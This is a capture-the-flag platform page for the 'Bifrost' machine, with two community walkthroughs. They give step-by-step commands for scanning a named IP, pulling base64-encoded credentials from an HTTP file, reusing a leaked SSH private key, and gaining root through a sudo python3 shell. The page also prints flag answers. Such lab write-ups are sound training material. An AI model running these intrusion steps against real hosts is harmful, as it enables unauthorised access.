🐀🐀🐀 0 pts earned

Bifrost

Premium Machine (Locked)

Bifrost was set up to bridge two legacy teams who couldn't agree on a file-sharing standard. So they ran both. Twice the surface, half the oversight. Somewhere in the middle of all that data lives a path forward.

💰 Season 1 Vault

Somewhere inside this machine a key fragment is concealed — not in plain sight, not in the obvious loot. Think beyond the standard exploit chain to find it. The fragment is encoded; the encoding method is hinted at within the machine itself.

The first player who locates, decodes, and enters the key wins permanently. There is no second place.

Log in to claim this vault.

Target IP Premium required

User Flag Pending

Root Flag Pending

Community

Community Hints

Grade A · 1000 pts Grade B · 700 pts Grade C · 400 pts Grade D · 200 pts + 150 credits on accept

Short, stage-specific nudges — directional, spoiler-light, no exact commands.

No community hints yet — be the first to add one!

Community

Community Walkthroughs

Grade A · 2500 pts Grade B · 1750 pts Grade C · 1000 pts Grade D · 500 pts + 300 credits on accept

suraj pun magar C 27 May 2026

Objective

Gain initial access via exposed services, escalate privileges, and retrieve both user and root flags.

Reconnaissance

We start with an Nmap scan:

nmap -sV -p 21,22,139,445,8080 139.144.165.183
Open ports discovered:
21/tcp – FTP (vsftpd 3.0.5)
22/tcp – SSH (OpenSSH 8.2p1)
139/tcp – SMB
445/tcp – SMB
8080/tcp – HTTP (SimpleHTTPServer)
2. SMB Enumeration

We list SMB shares:

smbclient -L //139.144.165.183 -N
Shares found:
public
data (restricted)
IPC$

We access the public share:

smbclient //139.144.165.183/public -N
ls

Inside:

readme.txt
readme.txt content:

Internal file share — authorised personnel only.

HTTP Enumeration (Port 8080)

Directory listing reveals:

backup.creds
notice.txt

Accessing files:

curl http://139.144.165.183:8080/backup.creds

We get Base64 encoded credentials:

c21idXNlcjpXZWxjMG1lMlRoZVNoYXJlIQ==

Decode it:

echo "c21idXNlcjpXZWxjMG1lMlRoZVNoYXJlIQ==" | base64 -d
Credentials found:
smbuser:Welc0me2TheShare!
4. SSH Access (Initial Foothold)

Login using credentials:

ssh smbuser@139.144.165.183

We successfully gain access as:

smbuser
5. Local Enumeration

Checking sudo permissions:

sudo -l

No sudo access available.

Searching for interesting files:

find / -type f 2>/dev/null | grep -E "flag|user|cred|pass"

We discover:

/home/labuser/user.txt

But also more important:

/srv/smb/data/id_rsa
/srv/smb/data/username.txt
6. Extracting SSH Key

We read:

cat /srv/smb/data/username.txt

Output:

labuser

Then extract private key:

cat /srv/smb/data/id_rsa

We obtain a valid SSH private key.

SSH as labuser

Save the key:

nano id_rsa
chmod 600 id_rsa

Login:

ssh -i id_rsa labuser@139.144.165.183

We successfully switch user to:

labuser
8. User Flag

As labuser:

cat /home/labuser/user.txt
Flag:
flag{user_shell_obtained}
9. Privilege Escalation

Check sudo privileges:

sudo -l

We find:

(root) NOPASSWD: /usr/bin/python3
10. Root Exploitation

Exploit sudo misconfiguration:

sudo python3 -c 'import os; os.system("/bin/bash")'

We get root shell:

root@server:~#
11. Root Flag
cat /root/root.txt
Final Flag:
flag{root_pwned_via_sudo_python3}
Summary
Attack Chain:
Nmap reconnaissance
SMB share enumeration
HTTP credential leakage
Base64 decoding → SMB credentials
SSH access as smbuser
Discovery of SSH private key
Login as labuser
sudo misconfiguration (python3)
Root shell
Root flag captured

mahnoor27 C 14 May 2026

Initial enumeration identified multiple exposed services including SMB, FTP, SSH, HTTP.
nmap -sV -p 21,22,139,445,8080 139.144.165.183
SMB share enumeration and FTP directory inspection revealed complementary artifacts that individually were incomplete.
smbclient -L //139.144.165.183 -N
ftp 139.144.165.183
Cross-referencing filenames and user-related fragments between SMB and FTP revealed partial credential data. Combining both datasets produced valid login credentials.

User access obtained via SSH using recovered credentials.

Privilege escalation was achieved by identifying misconfigured sudo permissions allowing Python execution as root:
sudo -l
sudo python3 -c 'import os; os.system("/bin/sh")'
Root shell obtained and root flag captured.